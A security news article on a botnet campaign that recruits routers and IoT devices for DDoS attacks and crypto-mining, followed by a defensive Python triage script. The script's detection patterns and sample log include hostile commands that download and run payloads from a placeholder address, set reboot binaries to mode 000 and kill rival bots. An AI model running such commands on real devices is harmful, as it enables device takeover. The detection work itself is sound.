New malware turns network devices into DDoS weapons
A newly discovered botnet malware converts routers and other network devices into tools for distributed denial-of-service (DDoS) attacks.
Mounting a distributed denial-of-service (DDoS) attack usually requires tooling to gather the machines that will do the flooding. Most often that tooling is botnet malware, which turns the devices of unsuspecting victims around the world into zombies that attack on command, and this report is one more instance of that kind of malware spreading.
According to a report cited by Cyber Security News, a botnet malware campaign has been detected whose aim is to recruit devices for DDoS attacks. The campaign focuses on network-related equipment: routers, Internet of Things (IoT) devices and enterprise network management appliances. Three pieces of malware are involved: CondiBot, a DDoS botnet implanted on Linux-based network management devices; Monaco, a malware that scans for Secure Shell (SSH) services to attack (an SSH scanner); and a Monero cryptocurrency miner that Monaco drops once it has successfully implanted itself on a system. All three were detected at the beginning of March. The first two are new samples that had never before been recorded on well-known malware analysis services such as VirusTotal, ThreatFox and Hybrid Analysis.
The research team at Eclypsium, a firm specialising in supply-chain security, assesses that the spreading behaviour is unlikely to be the work of state-sponsored actors; it looks more like criminals hoping to profit by using victims' machine resources to mine cryptocurrency. Such actors tend to exploit security vulnerabilities in the victim's device, including zero-day flaws. More dangerous still, the devices targeted in this campaign are usually ones that cannot run ordinary security monitoring tools (a router or IoT device has no endpoint agent), so both the attackers and the malware can remain on the system for a long time without being detected.
The CondiBot infection begins with the attackers using a file-transfer utility such as wget, curl, tftp or ftpget to fetch the payload onto a Linux device that has a security vulnerability (the source does not specify which vulnerability). Once the payload is running on the target, the malware disables the device's reboot utility by changing the permissions of the relevant files to 000, so the victim cannot simply reboot out of the infection. It then contacts its command-and-control (C2) server and registers, sending a unique bot identifier.
After registering, the malware enters a wait loop, listening for commands from the C2 server. On command it dispatches one of its 32 attack handlers. The malware can also remove any other botnet malware already present on the device, including terminating a process named /bin/sora, so that it has the machine to itself. With this thorough takeover the malware is very hard to deal with from the outside; short of having direct access to the device itself, there is little an operator can do to remediate it.
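The chain above (fetch with wget/curl/tftp/ftpget, chmod the reboot utility to 000, kill competing bots such as /bin/sora) is concrete enough to turn into triage checks. The script below is an added example written for this article; it is not code from the report or from Eclypsium. The binary paths, the regular expressions and the sample command log are assumptions and constructed data, not indicators taken from the source, and 203.0.113.9 is a documentation address. It runs three rules over recorded shell commands (download-then-execute, disabling reboot, killing a rival bot) and, on a live host, reports any reboot-related binary whose permission bits are exactly 000.

```python
"""Triage heuristics for the CondiBot-style infection chain described above.

Added example, not from the report. Paths, regexes and the sample
command log are assumptions/constructed data, not indicators from the source.
"""
import os
import re
import stat
from typing import Iterable

# Delivery: one of the downloaders the report names, followed in the same
# command line by a chmod or an execution ("fetch; chmod; run").
DOWNLOAD_EXEC_RE = re.compile(
    r"\b(?:wget|curl|tftp|ftpget)\b[^;&|]*(?:;|&&|\|\|)\s*(?:chmod\s+[+0-7]\S*|sh\s|\./)"
)

# Persistence tamper: chmod 000 applied to a reboot/shutdown binary.
CHMOD_ZERO_RE = re.compile(r"\bchmod\s+0?000\b.*\b(?:reboot|shutdown|busybox)\b")

# Takeover: killing a competing bot. /bin/sora is the process the report
# names; the other names are assumed generic equivalents.
KILL_RE = re.compile(r"/bin/sora|\b(?:kill|killall|pkill)\b.*\b(?:sora|mirai|bot)\b", re.I)

# Binaries to check for mode 000 on a live host. The exact paths are
# assumptions; many embedded devices link reboot to busybox instead.
REBOOT_BINARIES = ("/sbin/reboot", "/bin/reboot", "/sbin/shutdown", "/bin/busybox")

RULES = (
    ("download-then-execute", DOWNLOAD_EXEC_RE),
    ("disable-reboot", CHMOD_ZERO_RE),
    ("kill-competing-bot", KILL_RE),
)


def find_zeroed_modes(modes: dict[str, int]) -> list[str]:
    """Given path -> st_mode, return the paths whose permission bits are 000."""
    return [p for p, m in modes.items() if stat.S_IMODE(m) == 0]


def reboot_disabled(paths: Iterable[str] = REBOOT_BINARIES) -> list[str]:
    """Live check: stat each path on this host and report any with mode 000."""
    modes = {}
    for p in paths:
        try:
            modes[p] = os.stat(p).st_mode
        except FileNotFoundError:
            continue  # not every device ships every binary
    return find_zeroed_modes(modes)


def scan_commands(lines: Iterable[str]) -> list[dict]:
    """Run every rule over recorded shell commands; one finding per rule hit."""
    findings = []
    for n, line in enumerate(lines, 1):
        for name, rx in RULES:
            if rx.search(line):
                findings.append({"line": n, "rule": name, "text": line.strip()})
    return findings


def summarize(lines: Iterable[str]) -> dict[str, int]:
    """Count findings per rule, for a quick verdict on a session."""
    counts: dict[str, int] = {}
    for f in scan_commands(lines):
        counts[f["rule"]] = counts.get(f["rule"], 0) + 1
    return counts


# Constructed sample, as a honeypot or a device's shell history might record it.
SAMPLE_COMMANDS = [
    "cd /tmp; wget http://203.0.113.9/x86 -O x86; chmod 777 x86; ./x86 router",
    "curl -s http://203.0.113.9/arm7 -o /tmp/a && sh /tmp/a",
    "tftp -g -r bot.mips 203.0.113.9; chmod +x bot.mips; ./bot.mips",
    "chmod 000 /sbin/reboot /sbin/shutdown",
    "killall -9 sora; kill -9 $(pidof /bin/sora)",
    "wget https://example.com/index.html -O /tmp/page.html",  # benign download
    "curl -I https://example.com | head -1",                  # benign
]


if __name__ == "__main__":
    for f in scan_commands(SAMPLE_COMMANDS):
        print(f"line {f['line']:>2} [{f['rule']}] {f['text']}")
    print("per-rule counts:", summarize(SAMPLE_COMMANDS))
    print("reboot binaries with mode 000 on this host:", reboot_disabled())
```

The command rules are deliberately narrow: a lone wget or curl is normal on a device, so the download rule only fires when the fetch is chained to a chmod or an execution in the same line. The live reboot check is the cheapest field test of the persistence step the report describes; an empty result does not prove a clean device, but a 000 mode on /sbin/reboot on a box nobody hardened that way is a strong sign.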